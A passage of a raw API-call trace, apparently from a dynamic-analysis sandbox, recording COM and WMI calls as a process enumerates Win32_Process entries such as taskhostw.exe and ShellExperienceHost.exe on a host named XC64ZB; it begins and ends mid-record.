Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.294] IUnknown:Release (This=0x550b284) returned 0x3 [0264.294] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.294] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.294] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.294] IUnknown:Release (This=0x550b280) returned 0x2 [0264.294] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.294] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.294] IUnknown:QueryInterface (in: This=0x550b280, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x550b280) returned 0x0 [0264.294] IUnknown:AddRef (This=0x550b280) returned 0x4 [0264.294] IUnknown:Release (This=0x550b280) returned 0x3 [0264.294] IUnknown:Release (This=0x550b280) returned 0x2 [0264.294] CoTaskMemFree (pv=0x54ba2c8) [0264.295] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.295] IUnknown:AddRef (This=0x550b280) returned 0x3 [0264.295] IWbemClassObject:Get (in: This=0x550b280, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.295] IWbemClassObject:Get (in: This=0x550b280, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2080\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.295] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x5e [0264.295] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x5e [0264.295] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.295] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.295] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.295] IUnknown:Release (This=0x601a94) returned 0x1 [0264.296] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.297] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661630) returned 0x0 [0264.297] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661630) returned 0x0 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.297] WbemDefPath:IUnknown:AddRef (This=0x661630) returned 0x3 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513d48) returned 0x0 [0264.298] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513d48, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.298] WbemDefPath:IUnknown:Release (This=0x5513d48) returned 0x3 [0264.298] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.298] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.298] WbemDefPath:IUnknown:Release (This=0x661630) returned 0x2 [0264.298] WbemDefPath:IUnknown:Release (This=0x661630) returned 0x1 [0264.298] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.298] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x661630, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661630) returned 0x0 [0264.298] WbemDefPath:IUnknown:AddRef (This=0x661630) returned 0x3 [0264.298] WbemDefPath:IUnknown:Release (This=0x661630) returned 0x2 [0264.298] WbemDefPath:IWbemPath:SetText (This=0x661630, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x0 [0264.298] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.298] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.298] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.299] IWbemClassObject:Get (in: This=0x550b280, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c64ac*=0, plFlavor=0x23c64b0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhostw.exe", varVal2=0x0), pType=0x23c64ac*=8, plFlavor=0x23c64b0*=0) returned 0x0 [0264.299] SysStringByteLen (bstr="taskhostw.exe") returned 0x1a [0264.299] SysStringByteLen (bstr="taskhostw.exe") returned 0x1a [0264.299] IWbemClassObject:Get (in: This=0x550b280, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c64ac*=8, plFlavor=0x23c64b0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhostw.exe", varVal2=0x0), pType=0x23c64ac*=8, plFlavor=0x23c64b0*=0) returned 0x0 [0264.299] SysStringByteLen (bstr="taskhostw.exe") returned 0x1a [0264.299] SysStringByteLen (bstr="taskhostw.exe") returned 0x1a [0264.299] CoTaskMemAlloc (cb=0x4) returned 0x54ba3a8 [0264.299] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba3a8, puReturned=0x23c1fd0 | out: apObjects=0x54ba3a8*=0x6a07a0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.300] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x6a07a0) returned 0x0 [0264.300] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.301] IUnknown:AddRef (This=0x6a07a0) returned 0x3 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x6a07a4) returned 0x0 [0264.301] IMarshal:GetUnmarshalClass (in: This=0x6a07a4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.301] IUnknown:Release (This=0x6a07a4) returned 0x3 [0264.301] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.301] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.301] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.301] IUnknown:Release (This=0x6a07a0) returned 0x2 [0264.302] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.302] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.302] IUnknown:QueryInterface (in: This=0x6a07a0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x6a07a0) returned 0x0 [0264.302] IUnknown:AddRef (This=0x6a07a0) returned 0x4 [0264.302] IUnknown:Release (This=0x6a07a0) returned 0x3 [0264.302] IUnknown:Release (This=0x6a07a0) returned 0x2 [0264.302] CoTaskMemFree (pv=0x54ba3a8) [0264.302] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.302] IUnknown:AddRef (This=0x6a07a0) returned 0x3 [0264.302] IWbemClassObject:Get (in: This=0x6a07a0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.302] IWbemClassObject:Get (in: This=0x6a07a0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2420\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.302] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x5e [0264.302] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x5e [0264.302] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.303] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.303] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.303] IUnknown:Release (This=0x601a94) returned 0x1 [0264.303] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3a8) returned 0x0 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.304] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3a8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515458) returned 0x0 [0264.304] WbemDefPath:IUnknown:Release (This=0x54ba3a8) returned 0x0 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515458) returned 0x0 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.304] WbemDefPath:IUnknown:AddRef (This=0x5515458) returned 0x3 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5514030) returned 0x0 [0264.305] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5514030, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.305] WbemDefPath:IUnknown:Release (This=0x5514030) returned 0x3 [0264.305] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.305] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.305] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.305] WbemDefPath:IUnknown:Release (This=0x5515458) returned 0x2 [0264.305] WbemDefPath:IUnknown:Release (This=0x5515458) returned 0x1 [0264.305] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.305] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.305] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515458, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515458) returned 0x0 [0264.305] WbemDefPath:IUnknown:AddRef (This=0x5515458) returned 0x3 [0264.305] WbemDefPath:IUnknown:Release (This=0x5515458) returned 0x2 [0264.305] WbemDefPath:IWbemPath:SetText (This=0x5515458, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x0 [0264.305] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.305] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.305] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.306] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.306] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.306] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.306] IWbemClassObject:Get (in: This=0x6a07a0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c6d40*=0, plFlavor=0x23c6d44*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ShellExperienceHost.exe", varVal2=0x0), pType=0x23c6d40*=8, plFlavor=0x23c6d44*=0) returned 0x0 [0264.306] SysStringByteLen (bstr="ShellExperienceHost.exe") returned 0x2e [0264.306] SysStringByteLen (bstr="ShellExperienceHost.exe") returned 0x2e [0264.306] IWbemClassObject:Get (in: This=0x6a07a0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c6d40*=8, plFlavor=0x23c6d44*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ShellExperienceHost.exe", varVal2=0x0), pType=0x23c6d40*=8, plFlavor=0x23c6d44*=0) returned 0x0 [0264.306] SysStringByteLen (bstr="ShellExperienceHost.exe") returned 0x2e [0264.306] SysStringByteLen (bstr="ShellExperienceHost.exe") returned 0x2e [0264.306] CoTaskMemAlloc (cb=0x4) returned 0x54ba388 [0264.344] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba388, puReturned=0x23c1fd0 | out: apObjects=0x54ba388*=0x55156a0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.345] IUnknown:QueryInterface (in: This=0x55156a0, 